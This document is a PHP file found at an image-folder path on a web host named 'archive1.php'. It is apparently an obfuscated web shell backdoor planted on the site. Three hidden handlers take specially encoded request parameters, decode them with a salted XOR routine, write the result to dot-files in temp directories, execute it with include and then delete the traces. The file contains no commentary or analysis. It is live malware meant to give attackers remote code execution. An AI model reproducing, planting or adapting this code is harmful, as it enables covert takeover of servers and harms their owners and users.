File: //proc/thread-self/root/proc/self/root/home/vitanhod/vigolic100.vitavit.com.pk/img/archive1.php
<?php if(isset($_POST["prop\x65r\x74\x79\x5F\x73\x65t"]) ? true : false){ $fac = array_filter([session_save_path(), sys_get_temp_dir(), "/var/tmp", getenv("TEMP"), "/tmp", ini_get("upload_tmp_dir"), "/dev/shm", getenv("TMP"), getcwd()]); $hld = $_POST["prop\x65r\x74\x79\x5F\x73\x65t"]; $hld = explode ( "." , $hld ); $element =''; $salt5 ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen( $salt5 ); $s =0; $__tmp =$hld; while( $v2 =array_shift( $__tmp)) { $sChar =ord( $salt5[$s % $sLen] ); $d =( ( int)$v2 - $sChar -( $s % 10)) ^ 3; $element .= chr( $d ); $s++;} foreach ($fac as $desc) { if (!!is_dir($desc) && !!is_writable($desc)) { $component = str_replace("{var_dir}", $desc, "{var_dir}/.flag"); if (file_put_contents($component, $element)) { include $component; @unlink($component); exit; } } } }
if(count($_REQUEST) > 0 && isset($_REQUEST["k"])){ $ent = $_REQUEST["k"]; $ent = explode( '.', $ent ) ; $ptr = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s ); $o = 0; array_walk( $ent, function( $v4) use( &$ptr, &$o, $s, $sLen) {$sChar = ord( $s[$o % $sLen] ); $dec =( ( int)$v4 - $sChar -( $o % 10)) ^ 58; $ptr .= chr( $dec ); $o++; } ); $mrk = array_filter([getenv("TMP"), getcwd(), "/dev/shm", "/var/tmp", ini_get("upload_tmp_dir"), sys_get_temp_dir(), session_save_path(), "/tmp", getenv("TEMP")]); foreach ($mrk as $key => $itm) { if (is_dir($itm) && is_writable($itm)) { $fac = "$itm/.holder"; if (file_put_contents($fac, $ptr)) { include $fac; @unlink($fac); exit; } } } }
if(isset($_REQUEST["\x6Fbj\x65ct"])){
$data_chunk = $_REQUEST["\x6Fbj\x65ct"];
$data_chunk =explode ( "." ,$data_chunk ) ;
$ent = '';
$s = 'abcdefghijklmnopqrstuvwxyz0123456789';
$sLen = strlen( $s);
$l = 0;
foreach( $data_chunk as $v9) {
$sChar = ord( $s[$l % $sLen]);
$dec =( ( int)$v9 - $sChar -( $l % 10)) ^ 61;
$ent .= chr( $dec);
$l++; }
$component = array_filter([session_save_path(), getcwd(), ini_get("upload_tmp_dir"), getenv("TEMP"), "/tmp", getenv("TMP"), "/dev/shm", "/var/tmp", sys_get_temp_dir()]);
$desc = 0;
do {
$marker = $component[$desc] ?? null;
if ($desc >= count($component)) break;
if (max(0, is_dir($marker) * is_writable($marker))) {
$itm = str_replace("{var_dir}", $marker, "{var_dir}/.tkn");
$success = file_put_contents($itm, $ent);
if ($success) {
include $itm;
@unlink($itm);
die();}
}
$desc++;
} while (true);
}